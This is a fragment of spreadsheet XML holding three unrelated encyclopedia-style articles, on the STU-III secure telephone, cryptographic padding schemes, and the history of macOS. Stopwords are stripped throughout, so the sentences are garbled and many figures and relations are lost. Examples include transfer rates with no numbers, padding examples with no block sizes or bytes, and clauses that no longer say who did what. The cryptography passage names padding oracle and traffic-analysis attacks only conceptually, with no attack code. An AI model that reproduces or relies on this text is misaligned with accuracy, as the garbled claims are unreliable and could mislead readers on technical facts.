    <t>stu-iii (secure telephone unit third generation) family secure telephones introduced 1987 united states government, contractors, allies. stu-iii desk units look much like typical office telephones, plug standard telephone wall jack make calls ordinary phone user (with calls receiving special protection, however). when call placed another stu-iii unit properly caller initiate secure transmission. they press button telephones and, 15-second delay, call encrypted prevent eavesdropping. there portable militarized versions stu-iiis contained internal modem rs-232 port data transmission. vendors at&amp;t (later transferred lucent technologies), (now communications, east) motorola. stu-iii longer service u.s. government, last cryptographic keys units expiring december 2009. replaced (secure terminal equipment) equipment using modern secure communications interoperability protocol (scip). versions stu-iii/low cost terminal (lct) designed office environment types users. (motorola sectel 1500, lucent technologies/gd 1100 1150) stu-iii/cellular telephone (ct) interoperable stu-iii versions. works continental mobile network foreign cellular networks. stu-iii/allied specialized version stu-iii/lct compatible stu-ii. retains basic stu-iii functions capabilities incorporates stu-ii bellfield kdc, stu-ii net, stu-ii multipoint modes operation. stu-iii/remote control interface rcu) stu-iii/multimedia terminal (mmt) stu-iii/inter working function (iwf) stu-iii/secure data device (sdd) stu-iii/ciphertac 2000 (ctac) security most stu-iii units built calls type encryption. this allows protect conversations security classification levels secret, maximum level permitted call lower clearance level persons talking. height commercial comsec endorsement program, type stu-iiis manufactured, little commercial success. major factors stu-iii's success electronic management system (ekms) removable memory module plastic package shape house key, called ksd-64a. ekms believed first widespread applications asymmetric cryptography. greatly reduced complex logistics bookkeeping associated ensuring encryption device right keys keying material protected accounted for. ksd-64a contains 64kbit eeprom chip used store various types keying information. zeroized) stu-iii must first "seed key" installed. this shipped registered mail defense courier service. once stu-iii seed key, user calls toll-free number seed converted operational key. list compromised keys downloaded stu-iii time. operational supposed renewed least year. operational split components, replaces information ksd-64a, point becomes crypto ignition cik. when removed stu-iii telephone neither unit considered classified. only inserted stu-iii created classified information received sent. when call "goes secure", stu-iii's create unique used encrypt call placed. each unit first makes sure using revoked up-to-date revocation list, transmits other. presumably revocation lists protected digital signature generated nsa. while reports stu-iii encryption broken, claims foreign intelligence services recognize lines stu-iiis installed un-encrypted calls lines, particularly said waiting secure" command complete, provided valuable information. hundreds thousands stu-iii sets produced many still 2004. stu-iii replaced earlier voice encryption devices, including ky-3 (1960s), stu-i (1970) stu-ii (1975). stu-ii 10,000 users. these, turn, replaced less secure voice scramblers. unlike earlier systems, stu-iii's encryption electronics completely contained desk set. further, reduced bandwidth required stu-iii permitted used encrypted voice communications even limited conduits commercial maritime communication satellites day. stu-iii longer use, replaced (secure terminal equipment) omni, modern, digital systems overcome many stu-iii's problems, including second delay. operational difficulties using stu-iii phones hindered coordination federal aviation administration norad september 2001 attacks york washington. communication september attacks. succeeded stu-iii 1990s. similar stu-iii, unit physically resembles ordinary telephone. besides connecting regular wall phone jack (public switched telephone network), originally designed connected integrated services digital network (isdn) lines. result, addition secured voice conversations, users also unit classified data transmissions. transfer rate also considerably higher (stu-iii: kbit/s; ste: kbit/s). lastly, unit backward compatible stu-iii unit units connected pstn. heart unit fortezza plus (kov-14) crypto card, pcmcia card. contains cryptographic algorithms well key(s) used encryption. cryptographic algorithms include baton, firefly, sdns signature algorithm. when crypto card removed unit, neither phone card considered classified. baton block cipher developed block size bits size bits. firefly, hand, distribution protocol developed nsa. firefly protocol uses public cryptography exchange keys participants secured call. both stu-iii built technologies proprietary, details cryptographic algorithms (baton firefly) classified. although secrecy algorithms make device less secure, limit usage within u.s. government allies. within department defense, voice (voip) slowly emerged alternative solution stu-iii ste. high bandwidth networks makes voip attractive results voice quality superior stu-iii ste. secure voip calls, voip phones connected classified networks (e.g. secret internet protocol router network siprnet). both allies adversaries united states interested stu-iii, ste, secured voice technologies developed nsa. date, reported cryptanalysis encryption algorithms used stu-iii ste. breaks algorithms could jeopardize national security. information stu-iii limited despite fact production. because sensitive nature subject, relevant documents available. majority information available originates manufacturers (e.g. communications) stu-iii ste. also sigsaly stu-i stu-ii ky-57 kg-84 scip secure terminal equipment references external links stu-iii handbook stu-iii description, technical specification, pictures report voip secure communications navy infosec website stu-iii</t>
  </si>
  <si>
    <t>Padding (cryptography)</t>
  </si>
  <si>
    <t>cryptography, padding number distinct practices include adding data beginning, middle, message prior encryption. classical cryptography, padding include adding nonsense phrases message obscure fact many messages predictable ways, e.g. sincerely yours. classical cryptography official messages often start predictable ways: dear ambassador, weather report, sincerely yours, etc. primary padding classical ciphers prevent cryptanalyst using predictability find known plaintext aids breaking encryption. random length padding also prevents attacker knowing exact length plaintext message. famous example classical padding caused great misunderstanding "the world wonders" incident, nearly caused allied loss wwii battle samar, part larger battle leyte gulf. example, admiral chester nimitz, commander chief, u.s. pacific fleet world sent following message admiral bull halsey, commander task force thirty four (the main allied fleet) battle leyte gulf, october 1944: where repeat, task force thirty four? with padding (bolded) metadata added, message became: turkey trots water from cincpac action third fleet info cominch seventy-seven where where task force thirty four world wonders halsey's radio operator mistook padding message, admiral halsey ended reading following message: where repeat, task force thirty four? world wonders admiral halsey interpreted padding phrase "the world wonders" sarcastic reprimand, causing emotional outburst lock bridge sulk hour moving forces assist battle samar. halsey's radio operator tipped letters "the world wonders" padding; radio operators received admiral nimitz's message correctly removed padding phrases.many classical ciphers arrange plaintext particular patterns (e.g., squares, rectangles, etc.) plaintext exactly fit, often necessary supply additional letters fill pattern. using nonsense letters purpose side benefit making kinds cryptanalysis difficult. symmetric cryptography hash functions most modern cryptographic hash functions process messages fixed-length blocks; earliest hash functions include sort padding scheme. critical cryptographic hash functions employ termination schemes prevent hash vulnerable length extension attacks. many padding schemes based appending predictable data final block. example, could derived total length message. this kind padding scheme commonly applied hash algorithms merkle–damgård construction md-5, sha-1, sha-2 family sha-224, sha-256, sha-384, sha-512, sha512/224, sha-512/256 block cipher mode operation cipher-block chaining (cbc) mode example block cipher mode operation. some block cipher modes (cbc pcbc essentially) symmetric-key encryption algorithms require plain text input multiple block size, messages padded bring length. there currently shift streaming mode operation instead block mode operation. example streaming mode encryption counter mode operation. streaming modes operation encrypt decrypt messages size therefore require padding. more intricate ways ending message ciphertext stealing residual block termination avoid need padding. disadvantage padding makes plain text message susceptible padding oracle attacks. padding oracle attacks allow attacker gain knowledge plain text without attacking block cipher primitive itself. padding oracle attacks avoided making sure attacker cannot gain knowledge removal padding bytes. this accomplished verifying message authentication code (mac) digital signature removal padding bytes, switching streaming mode operation. padding padding applied messages size. single ('1') added message many reset ('0') bits required (possibly none) added. number reset ('0') bits added depend block boundary message needs extended. terms "1000 0000". this method used messages number bits long, necessarily whole number bytes long. example, message bits padded bits order fill 32-bit block: 1011 1001 1101 0100 0010 0111 0000 0000 this padding first step two-step padding scheme used many hash functions including sha. context, specified rfc1321 step 3.1. this padding scheme defined iso/iec 9797-1 padding method byte padding byte padding applied messages encoded integral number bytes. ansi x9.23 ansi x9.23, bytes always added padding. block padded random bytes (although many implementations last byte block number bytes added.example: following example block size bytes, padding required bytes hexadecimal format) 10126 10126 (withdrawn, 2007) specifies padding done last block random bytes, padding boundary specified last byte. example: following example block size bytes padding required bytes pkcs#5 pkcs#7 pkcs#7 described 5652. padding whole bytes. value added byte number bytes added, i.e. bytes, value added. number bytes added depend block boundary message needs extended. padding etc. this padding method well previous two) well-defined less 256. example: following example block size bytes padding required bytes length original data integer multiple block size extra block bytes value added. this necessary deciphering algorithm determine certainty whether last byte last block byte indicating number padding bytes added part plaintext message. consider plaintext message integer multiple bytes last byte plaintext with additional information, deciphering algorithm able determine whether last byte plaintext byte byte. however, adding bytes value plaintext byte, deciphering algorithm always treat last byte byte strip appropriate number bytes ciphertext; said number bytes stripped based value last byte. pkcs#5 padding identical pkcs#7 padding, except defined block ciphers 64-bit (8-byte) block size. practice used interchangeably. iso/iec 7816-4 iso/iec 7816-4:2005 identical padding scheme, applied plain text bytes. this means practice first byte mandatory byte valued '80' (hexadecimal) followed, needed, bytes '00', block reached. iso/iec 7816-4 communication standard smart cards containing file system, contain cryptographic specifications. example: following example block size bytes padding required bytes next example shows padding byte zero padding bytes required padded padded zero. zero padding scheme standardized encryption, although specified hashes macs padding method iso/iec 10118-1 iso/iec 9797-1.example: following example block size bytes padding required bytes zero padding reversible original file ends zero bytes, making impossible distinguish plaintext data bytes padding bytes. used length message derived out-of-band. often applied binary encoded strings (null-terminated string) null character usually stripped whitespace. zero padding sometimes also referred "null padding" "zero byte padding". some implementations additional block zero bytes plaintext already divisible block size. public cryptography public cryptography, padding process preparing message encryption signing using specification scheme pkcs#1 v2.2, oaep, pss, pssr, ieee p1363 emsa2 emsa5. modern form padding asymmetric primitives oaep applied algorithm, used encrypt limited number bytes. operation referred "padding" originally, random material simply appended message make long enough primitive. this form padding secure therefore longer applied. modern padding scheme aims ensure attacker cannot manipulate plaintext exploit mathematical structure primitive usually accompanied proof, often random oracle model, breaking padding scheme hard solving hard problem underlying primitive. traffic analysis protection padding even perfect cryptographic routines used, attacker gain knowledge amount traffic generated. attacker might know alice talking about, know talking much talked. circumstances leakage highly compromising. consider example military organising secret attack another nation: suffice alert nation know merely secret activity going another example, encrypting voice over streams variable rate encoding, number bits unit time obscured, exploited guess spoken phrases. similarly, burst patterns common video encoders produce often sufficient identify streaming video user watching uniquely. even total size object alone, website, file, software package download, online video, uniquely identify object, attacker knows guess known object comes from. side-channel encrypted content length used extract passwords https communications well-known crime breach attacks.padding encrypted message make traffic analysis harder obscuring true length payload. choice length message made either deterministically randomly; approach strengths weaknesses apply different contexts. randomized padding random number additional padding bits bytes appended message, together indication much padding added. amount padding chosen uniform random number maximum example, eavesdropper unable determine message's length precisely within range. maximum padding small compared message's total size, padding much overhead, padding obscure least-significant bits object's total length, leaving approximate length large objects readily observable hence still potentially uniquely identifiable length. maximum padding comparable size payload, contrast, eavesdropper's uncertainty message's true payload size much larger, cost padding 100% overhead blow-up) message. addition, common scenarios eavesdropper opportunity many successive messages sender, messages similar ways attacker knows guess, eavesdropper statistical techniques decrease eventually even eliminate benefit randomized padding. example, suppose user's application regularly sends messages length, eavesdropper knows guess fact based fingerprinting user's application example. alternatively, active attacker might able induce endpoint send messages regularly, victim public server. cases, eavesdropper simply compute average many observations determine length regular message's payload. deterministic padding deterministic padding scheme always pads message payload given length form encrypted message particular corresponding output length. when many payload lengths padded output length, eavesdropper cannot distinguish learn information payload's true length within length buckets, even many observations identical-length messages transmitted. respect, deterministic padding schemes advantage leaking additional information successive message payload size. hand, suppose eavesdropper benefit learning small variations payload size, plus minus byte password-guessing attack example. message sender unlucky enough send many messages whose payload lengths vary byte, length exactly border deterministic padding classes, plus-or-minus payload lengths consistently yield different padded lengths well (plus-or-minus block example), leaking exactly fine-grained information attacker desires. against risks, randomized padding offer protection independently obscuring least-significant bits message lengths. common deterministic padding methods include padding constant block size padding next-larger power two. like randomized padding small maximum amount however, padding deterministically block size much smaller message payload obscures least-significant bits messages true length, leaving messages's true approximate length largely unprotected. padding messages power fixed base) reduces maximum amount information message leak length o(log o(log padding power increases message size overhead 100%, however, padding powers larger integer bases increase maximum overhead further. padmé scheme, proposed padded uniform random blobs purbs, deterministically pads messages lengths representable floating point number whose mantissa longer (i.e., contains significant bits) exponent. this length constraint ensures message leaks o(log bits information length, like padding power two, incurs much less overhead tiny messages decreasing gradually message size. also chaffing winnowing, mixing large amounts nonsense sending ciphertext stealing, another approach deal messages multiple block length initialization vector, salt (cryptography), sometimes confused padding encapsulation, alternative padding public systems used exchange symmetric keys purb padded uniform random blob, encryption discipline minimizes leakage either metadata length russian copulation, another technique prevent cribs references further reading xcbc: csrc.nist.gov/groups/st/toolkit/bcm/documents/workshop2/presentations/xcbc.pdf</t>
  </si>
  <si>
    <t>MacOS</t>
  </si>
  <si>
    <t>macos previously later unix operating system developed marketed apple inc. since 2001. primary operating system apple's computers. within market desktop laptop computers second widely used desktop microsoft windows ahead chromeos. macos succeeded classic macintosh operating system nine releases 1984 1999. during time, apple cofounder steve jobs left apple started another company, next, developing nextstep platform would later acquired apple form basis macos. first desktop version, 10.0, released march 2001, first update, 10.1, arriving later year. releases 10.5 leopard unix certified, exception 10.7 lion. apple's mobile operating system, ios, considered variant macos.a prominent part macos's original brand identity roman numeral pronounced "ten" also iphone well code naming release species cats, places within california. apple shortened name 2012 changed "macos" 2016 align branding apple's operating systems, ios, watchos, tvos. after sixteen distinct versions macos macos presented version 2020, macos monterey presented version 2021. macos supported three major processor architectures, beginning powerpc-based macs 1999. 2006, apple transitioned intel architecture line macs using intel core processors. 2020, apple began apple silicon transition, using self-designed, 64-bit arm-based apple processors latest macintosh computers. history development heritage would become macos originated next, company founded steve jobs following departure apple 1985. there, unix-like nextstep operating system developed, launched 1989. kernel nextstep based upon mach kernel, originally developed carnegie mellon university, additional kernel layers low-level user space code derived parts bsd. graphical user interface built object-oriented toolkit using objective-c programming language. throughout early 1990s, apple tried create "next-generation" succeed classic taligent, copland gershwin projects, eventually abandoned. this apple purchase next 1996, allowing nextstep, called openstep, serve basis apple's next generation operating system. this purchase also steve jobs returning apple interim, permanent ceo, shepherding transformation programmer-friendly openstep system would adopted apple's primary market home users creative professionals. project first code named "rhapsody" officially named originally presented tenth major version apple's operating system macintosh computers; 2020, versions macos retained major version number "10". letter name refers number roman numeral, apple stated pronounced "ten" context. however, also commonly pronounced like letter "x". previous macintosh operating systems (versions classic named using arabic numerals, 2020 2021, apple reverted arabic numeral versioning successive releases, macos macos monterey, done iphone iphone following iphone first version server 1.0, transitional product, featuring interface resembling classic though compatible software designed older system. consumer releases included backward compatibility. applications could rewritten natively carbon api; many could also directly classic environment reduction performance. consumer version launched 2001 10.0. reviews variable, extensive praise sophisticated, glossy aqua interface, criticizing sluggish performance. with apple's popularity low, makers several classic applications framemaker pagemaker declined develop versions software technica columnist john siracusa, reviewed every major release 10.10, described early releases retrospect 'dog-slow, feature poor' aqua 'unbearably slow huge resource hog'.apple rapidly developed several releases siracusa's review version 10.3, panther, noted "it's strange gone years uncertainty vaporware steady annual supply major operating system releases." version 10.4, tiger, reportedly shocked executives microsoft offering number features, fast file searching improved graphics processing, microsoft spent several years struggling windows acceptable performance.as operating system evolved, moved away classic applications added removed. considering music market, apple developed ipod music player music software mac, including itunes garageband. targeting consumer media markets, apple emphasized "digital lifestyle" applications ilife suite, integrated home entertainment front media center safari browser. with increasing popularity internet, apple offered additional online services, including .mac, mobileme recently icloud products. later began selling third-party applications store. newer versions also included modifications general interface, moving away striped gloss transparency initial versions. some applications began brushed metal appearance, non-pinstriped title appearance version 10.4. leopard, apple announced unification interface, standardized gray-gradient window style.in 2006, first intel macs released used specialized version 10.4 tiger.a development system announcement release iphone 2007 onwards. while apple's previous ipod media players used minimal operating system, iphone used operating system based would later called "iphone ios. simultaneous release operating systems based frameworks placed tension apple, cited iphone forcing delay 10.5 leopard. however, apple opened iphone third-party developers commercial success drew attention many iphone software developers showing interest development.in 2007, 10.5 leopard sole release universal binary components, allowing installation intel macs select powerpc macs. also final release powerpc support. 10.6 snow leopard first version built exclusively intel macs, final release 32-bit intel support. name intended signal status iteration leopard, focusing technical performance improvements rather user-facing features; indeed explicitly branded developers features' release. since release, several macos releases (namely mountain lion, capitan, macos high sierra, macos monterey) follow pattern, name derived predecessor, similar 'tick–tock model' used intel. succeeding versions, lion mountain lion, apple moved applications highly skeuomorphic style design inspired contemporary versions simplifying elements making controls scroll bars fade use. this direction was, like brushed metal interfaces, unpopular users, although continued trend greater animation variety interface previously seen design aspects time machine backup utility, presented past file versions swirling nebula, glossy translucent dock leopard snow leopard. addition, 10.7 lion, apple ceased release separate server versions selling server tools separate downloadable application store. review described trend server products becoming "cheaper simpler... shifting focus large businesses small ones." 2012, release 10.8 mountain lion, name system shortened that year, apple removed head development, scott forstall, design changed towards minimal direction. apple's user interface design, using deep color saturation, text-only buttons minimal, 'flat' interface, debuted 2013. with engineers reportedly working version released 2013, 10.9 mavericks, something transitional release, skeuomorphic design removed, general interface mavericks remained unchanged. next version, 10.10 yosemite, adopted design similar greater complexity suitable interface controlled mouse.from 2012 onwards, system shifted annual release schedule similar ios. also steadily cost updates snow leopard onwards, removing upgrade fees altogether 2013 onwards. some journalists third-party software developers suggested decision, allowing rapid feature release, meant less opportunity focus stability, version recommendable users requiring stability performance features. apple's 2015 update, 10.11 capitan, announced focus specifically stability performance improvements. macos 2016, release macos 10.12 sierra, name changed macos align branding apple's primary operating systems: ios, watchos, tvos. macos 10.12 sierra's main features introduction siri macos, optimized storage, improvements included applications, greater integration apple's iphone apple watch. apple file system (apfs) announced apple's annual worldwide developers conference (wwdc) june 2016 replacement hfs+, highly criticized file system.apple previewed macos 10.13 high sierra wwdc 2017, releasing later year. when running solid state drives, uses apfs, rather hfs+. successor, macos 10.14 mojave, released 2018, adding dark user interface option dynamic wallpaper setting. succeeded macos 10.15 catalina 2019, replaces itunes separate apps different types media, introduces catalyst system porting apps.in 2020, apple previewed macos wwdc 2020. this first increment primary version number macos since release public beta 2000; updates macos given 11.x numbers, matching version numbering scheme used apple's operating systems. brought major changes first version instruction set. numbering system continued 2021 macos monterey. architecture macos's core posix-compliant operating system built kernel, standard unix facilities available command line interface. apple released family software free open source operating system named darwin. darwin, apple layered number components, including aqua interface finder, complete gui-based operating system macos.with original introduction system brought number capabilities provide stable reliable platform predecessor, classic example, pre-emptive multitasking memory protection improved system's ability multiple applications simultaneously without interrupting corrupting other. many aspects macos's architecture derived openstep, designed portable, ease transition platform another. example, nextstep ported original 68k-based next workstations architectures next purchased apple, openstep later ported powerpc architecture part rhapsody project. prior macos high sierra, drives solid state drives (ssds), default file system hfs+, inherited classic operating system designer linus torvalds criticized hfs+, saying "probably worst file system ever", whose design "actively corrupting user data". criticized case insensitivity file names, design made worse apple extended file system support unicode.the darwin subsystem macos manages file system, includes unix permissions layer. 2003 2005, macworld editors expressed criticism permission scheme; landau called misconfigured permissions "the common frustration" macos, griffiths suggested users even reset permissions every day, process take minutes. more recently, another macworld editor, frakes, called procedure repairing permissions vastly overused. argues macos typically handles permissions properly without user interference, resetting permissions tried problems emerge.the architecture macos incorporates layered design: layered frameworks rapid development applications providing existing code common tasks. apple provides software development tools, prominently integrated development environment called xcode. xcode provides interfaces compilers support several programming languages including c++, objective-c, swift. transition intel processors, modified developers could build applications universal binary, provides compatibility intel-based powerpc-based macintosh lines. first third-party applications controlled programmatically using applescript framework, retained classic using newer automator application offers pre-written tasks require programming knowledge. software compatibility apple offered main apis develop software natively macos: cocoa carbon. cocoa descendant apis inherited openstep ancestry classic carbon adaptation classic apis, allowing software minimally rewritten natively x.the cocoa created result 1993 collaboration next computer microsystems. this heritage highly visible cocoa developers, since "ns" prefix ubiquitous framework, standing variously nextstep next/sun. official openstep api, published september 1994, first split foundation applicationkit first "ns" prefix. traditionally, cocoa programs mostly written objective-c, java alternative. however, july 2005, apple announced "features added cocoa versions later 10.4 added cocoa-java programming interface." macos also used support java platform "preferred software package"—in practice means applications written java neatly operating system possible still cross-platform compatible, graphical user interfaces written swing look almost exactly like native cocoa interfaces. since 2014, apple promoted programming language swift preferred language software development apple platforms. apple's original plan macos require developers rewrite software cocoa apis. this caused much outcry among existing developers, threatened abandon platform rather invest costly rewrite, idea shelved. permit smooth transition carbon application programming interface (api) created. applications written carbon initially able natively classic although ability later dropped developed. carbon included first product sold little-used original release server 1.0, also include aqua interface. apple limited development carbon release leopard onwards announced carbon applications would 64-bit. number macos applications continued carbon time afterwards, especially ones heritage dating back classic updates would difficult, uneconomic necessary. this included microsoft office office 2016, photoshop cs5. early versions macos could also classic applications classic environment performance limitations; feature removed 10.5 onwards macs using intel processors. because macos posix compliant, many software packages written unix-like systems including linux recompiled including much scientific technical software. third-party projects homebrew, fink, macports pkgsrc provide pre-compiled pre-formatted packages. apple others provided versions window system graphical interface allow applications approximation macos look-and-feel. current apple-endorsed method open-source xquartz project; earlier versions could application provided apple, xdarwin project.applications distributed macs installed user source method downloading (with without code signing, available apple developer account) store, marketplace software maintained apple process requiring company's approval. apps installed store within sandbox, restricting ability exchange information applications modify core operating system features. this cited advantage, allowing users install apps confidence able damage system, also disadvantage blocking store's professional applications require elevated privileges. applications without code signature cannot default except computer's administrator account.apple produces macos applications. some included macos sold separately. this includes iwork, final pro, logic pro, ilife, database application filemaker. numerous developers also offer software macos. 2018, apple introduced application layer, reportedly codenamed marzipan, port apps macos. macos mojave included ports four first-party apps including home news, announced would available third-party developers 2019. hardware compatibility list macos versions, supported systems run, requirements tools xpostfacto patches applied installation media developed third parties enable installation newer versions macos systems officially supported apple. this includes number pre-g3 power macintosh systems made including 10.2 jaguar, g3-based macs including tiger, sub-867 macs leopard removing restriction installation entering command mac's open firmware interface tell leopard installer clock rate greater. except features requiring specific hardware graphics acceleration writing, operating system offers functionality supported hardware. hardware components, components similar those, since intel transition available purchase, technology-capable groups developed software install macos non-apple computers. these referred hackintoshes, portmanteau words "hack" "macintosh". this violates apple's eula (and therefore unsupported apple technical support, warranties etc.), communities cater personal users, install resale profit, generally ignored apple. these self-made computers allow flexibility customization hardware, cost leaving user responsible machine, matter data integrity security. psystar, business attempted profit selling macos non-apple certified hardware, sued apple 2008. powerpc–intel transition april 2002, eweek announced rumor apple version code-named marklar, intel processors. idea behind marklar keep running alternative platform apple become dissatisfied progress powerpc platform. these rumors subsided late 2005, various media outlets, wall street journal cnet, announced apple would unveil marklar coming months.on june 2005, steve jobs announced keynote address wwdc apple would making transition powerpc intel processors following years, would support platforms transition. jobs also confirmed rumors apple versions running intel processors developmental life. intel-based macs would recompiled version along rosetta, binary translation layer enables software compiled powerpc intel machines. system included versions version 10.6.8. apple dropped support classic mode intel macs. third party emulation software mini vmac, basilisk sheepshaver provided support early versions version xcode underlying command-line compilers supported building universal binaries would either architecture.powerpc-only software supported apple's official emulation software, rosetta, though applications eventually rewritten properly newer versions released intel processors. apple initially encouraged developers produce universal binaries support powerpc intel. powerpc binaries suffer performance penalty intel macs rosetta. moreover, powerpc software, kernel extensions system preferences plugins, supported intel macs all. some powerpc applications would macos all. plugins safari need compiled platform safari, safari running intel, requires plug-ins compiled intel-only universal binaries, powerpc-only plug-ins work. while intel macs powerpc, intel, universal binaries, powerpc macs support universal powerpc builds. support powerpc platform dropped following transition. 2009, apple announced wwdc 10.6 snow leopard would drop support powerpc processors intel-only. rosetta continued offered optional download installation choice snow leopard discontinued 10.7 lion. addition, versions first- third-party software increasingly required intel processors, including versions ilife, iwork, aperture logic pro. intel–apple silicon transition rumors apple shifting macs processors used devices began circulating early 2011, ebbed flowed throughout 2010s. rumors intensified 2020, numerous reports announced company would announce shift custom processors wwdc.apple officially announced shift processors designed in-house june 2020, wwdc 2020, transition planned last years. first release macos support macos sur.(using program called rosetta sequel original rosetta) change processor architecture allows macs processors able natively ipados apps. features aqua user interface major differences classic current macos addition aqua, graphical user interface water-like elements, first major release every window element, text, graphic, widget drawn on-screen using spatial anti-aliasing technology. colorsync, technology introduced many years before, improved built core drawing engine, provide color matching printing multimedia professionals. also, drop shadows added around windows isolated text elements provide sense depth. interface elements integrated, including sheets (dialog boxes attached specific windows) drawers, would slide provide options. soft edges, translucent colors, pinstripes, similar hardware design first imacs, brought texture color user interface compared server 1.0's "platinum" appearance offered. according siracusa, introduction aqua departure conventional look "hit like bricks."bruce tognazzini (who founded original apple human interface group) said aqua interface 10.0 represented step backwards usability compared original interface. third-party developers started producing skins customizable applications operating systems mimicked aqua appearance. extent, apple used successful transition design leverage, various times threatening legal action people make distribute software interface company says derived copyrighted design.apple continued change aspects macos appearance design, particularly tweaks appearance windows menu bar. since 2012, apple sold many models high-resolution retina displays, macos apis extensive support resolution-independent development supporting high-resolution displays. reviewers described apple's support technology superior windows.the human interface guidelines published apple macos followed many applications, giving consistent user interface keyboard shortcuts. addition, services applications included, include spelling grammar checkers, special characters palette, color picker, font chooser dictionary; global features present every cocoa application, adding consistency. graphics system opengl composites windows onto screen allow hardware-accelerated drawing. this technology, introduced version 10.2, called quartz extreme, component quartz. quartz's internal imaging model correlates well portable document format (pdf) imaging model, making easy output multiple devices. side result, viewing creating documents application built-in features. reflecting popularity design users, macos also system support variety professional video image formats includes extensive pre-installed font library, featuring many prominent brand-name designs. components finder file browser allowing quick access areas computer, modified throughout subsequent releases macos. quick look part finder since version 10.5. allows dynamic previews files, including videos multi-page documents without opening applications. spotlight, file searching technology integrated finder since version 10.4, allows rapid real-time searches data files; mail messages; photos; information based item properties (metadata) content. macos makes dock, holds file folder shortcuts well minimized windows. apple added exposé version 10.3 (called mission control since version 10.7), feature includes three functions help accessibility windows desktop. functions instantly display open windows thumbnails easy navigation different tasks, display open windows thumbnails current application, hide windows access desktop. filevault optional encryption user's files 128-bit advanced encryption standard (aes-128).features introduced version 10.4 include automator, application designed create automatic workflow different tasks; dashboard, full-screen group small applications called desktop widgets called dismissed keystroke; front row, media viewer interface accessed apple remote. sync services allows applications access centralized extensible database various elements user data, including calendar contact items. operating system managed conflicting edits data consistency.all system icons scalable 512×512 pixels version 10.5 accommodate various places appear larger size, including example cover flow view, three-dimensional graphical user interface included itunes, finder, apple products visually skimming files digital media libraries cover artwork. that version also introduced spaces, virtual desktop implementation enables user desktop display exposé-like interface; automatic backup technology called time machine, allows users view restore previous versions files application data; screen sharing built first time.in recent releases, apple developed support emoji characters including proprietary apple color emoji font. apple also connected macos social networks twitter facebook addition share buttons content pictures text. apple brought several applications features originally debuted ios, mobile operating system, macos recent releases, notably intelligent personal assistant siri, introduced version 10.12 macos. multilingual support there system languages available macos user moment installation; system language used throughout entire operating system environment. input methods typing dozens scripts chosen independently system language. recent updates added increased support chinese characters interconnections popular social networks china. updating methods macos updated using software update preference pane system preferences softwareupdate command line utility. until 10.8 mountain lion, separate software update application performed functionality. mountain lion later, merged store application, although underlying update mechanism remains unchanged fundamentally different download mechanism used purchasing store application. macos 10.14 mojave, updating function moved software update preference pane. release history powermac special jaguar builds. tiger support 64-bit applications, 64-bit applications. 32-bit (but 64-bit) powerpc applications supported intel processors rosetta. 64-bit intel applications supported apple silicon macs rosetta however, intel-based macs unable arm-based applications, ipados apps. with exception server original public beta, versions named cats 10.9 mavericks, apple switched using california locations. prior release, 10.0 code named "cheetah" internally apple, 10.1 code named internally "puma". after immense buzz surrounding 10.2, codenamed "jaguar", apple's product marketing began openly using code names promote operating system. 10.3 marketed "panther", 10.4 "tiger", 10.5 "leopard", 10.6 "snow leopard", 10.7 "lion", 10.8 "mountain lion", 10.9 "mavericks". "panther", "tiger" "leopard" registered trademarks apple, "cheetah", "puma" "jaguar" never registered. apple also registered "lynx" "cougar" trademarks, though allowed lapse. computer retailer tiger direct sued apple name "tiger". 2005, federal court southern district florida ruled apple's infringe tiger direct's trademark. public beta september 2000, apple released $29.95 "preview" version internally codenamed kodiak, gain feedback users. "pb", known, marked first public availability aqua interface apple made many changes based customer feedback. public beta expired ceased function spring 2001. 10.0 (cheetah) march 2001, apple released 10.0 (internally codenamed cheetah). initial version slow, incomplete, applications available launch, mostly independent developers. while many critics suggested operating system ready mainstream adoption, recognized importance initial launch base improve. simply releasing received macintosh community great accomplishment, attempts overhaul underway since 1996, delayed countless setbacks. 10.1 (puma) later year september 2001, 10.1 (internally codenamed puma) released. featured increased performance provided missing features, playback. apple released 10.1 free upgrade 10.0 users, addition us$129 boxed version people running discovered upgrade full install could used systems removing specific file; apple later re-released actual stripped-down format facilitate installation systems. january 2002, apple announced default operating system macintosh products month. 10.2 jaguar august 2002, apple followed 10.2 jaguar, first release code name part branding. brought great performance improvements, sleeker look, many powerful user-interface enhancements (over 150, according apple), including quartz extreme compositing graphics directly radeon nvidia geforce2 agp-based video card least vram, system-wide repository contact information address book, instant messaging client named ichat. happy appeared startup sequence almost years replaced large grey apple logo introduction v10.2. 10.3 panther v10.3 panther released october 2003. significantly improved performance incorporated extensive update user interface. panther included many features jaguar year before, including updated finder, incorporating brushed-metal interface, fast user switching, exposé (window manager), filevault, safari, ichat (which added video conferencing features ichat), improved portable document format (pdf) rendering much greater microsoft windows interoperability. support early computers "beige" power macs "wallstreet" powerbooks discontinued. 10.4 tiger 10.4 tiger released april 2005. apple stated tiger contained features. panther, certain older machines longer supported; tiger requires built-in firewire port. among features, tiger introduced spotlight, dashboard, smart folders, updated mail program smart mailboxes, quicktime safari automator, voiceover, core image core video. initial release apple used modified version tiger different graphical interface fewer applications services. january 2006, apple released first intel-based macs along 10.4.4 update tiger. this operating system functioned identically powerpc-based macs intel-based machines, exception intel release lacking support classic environment. 10.5 leopard 10.5 leopard released october 2007. called apple "the largest update brought features. leopard supports powerpc- intel x86-based macintosh computers; support processor dropped processor required minimum clock rate mhz, least installed. single works supported macs (including 64-bit machines). features include look, updated finder, time machine, spaces, boot camp pre-installed, full support 64-bit applications (including graphical applications), features mail ichat, number security features. leopard open brand unix registered product intel platform. also first bsd-based receive unix certification. leopard dropped support classic environment classic applications. final version support powerpc architecture. 10.6 snow leopard 10.6 snow leopard released august 2009. rather delivering changes appearance user functionality like previous releases snow leopard focused "under hood" changes, increasing performance, efficiency, stability operating system. users, noticeable changes were: disk space operating system frees clean install compared 10.5 leopard, responsive finder rewritten cocoa, faster time machine backups, reliable user-friendly disk ejects, powerful version preview application, well faster safari browser. snow leopard supported machines intel cpus, required least ram, dropped default support applications built powerpc architecture (rosetta could installed additional component retain support powerpc-only applications).snow leopard also featured 64-bit technology capable supporting greater amounts ram, improved support multi-core processors grand central dispatch, advanced performance opencl.the 10.6.6 update introduced support store, apple's digital distribution platform macos applications. 10.7 lion 10.7 lion released july 2011. brought developments made apple's ios, easily navigable display installed applications called launchpad greater multi-touch gestures, mac. this release removed rosetta, making incompatible powerpc applications.changes made include auto-hiding scrollbars appear used, mission control unifies exposé, spaces, dashboard, full-screen applications within single interface. apple also made changes applications: resume state closed, similar ios. documents auto-save default. 10.8 mountain lion 10.8 mountain lion released july 2012. following release lion previous year, first annual rather two-yearly updates (and later macos), also closely aligned annual operating system updates. incorporates features 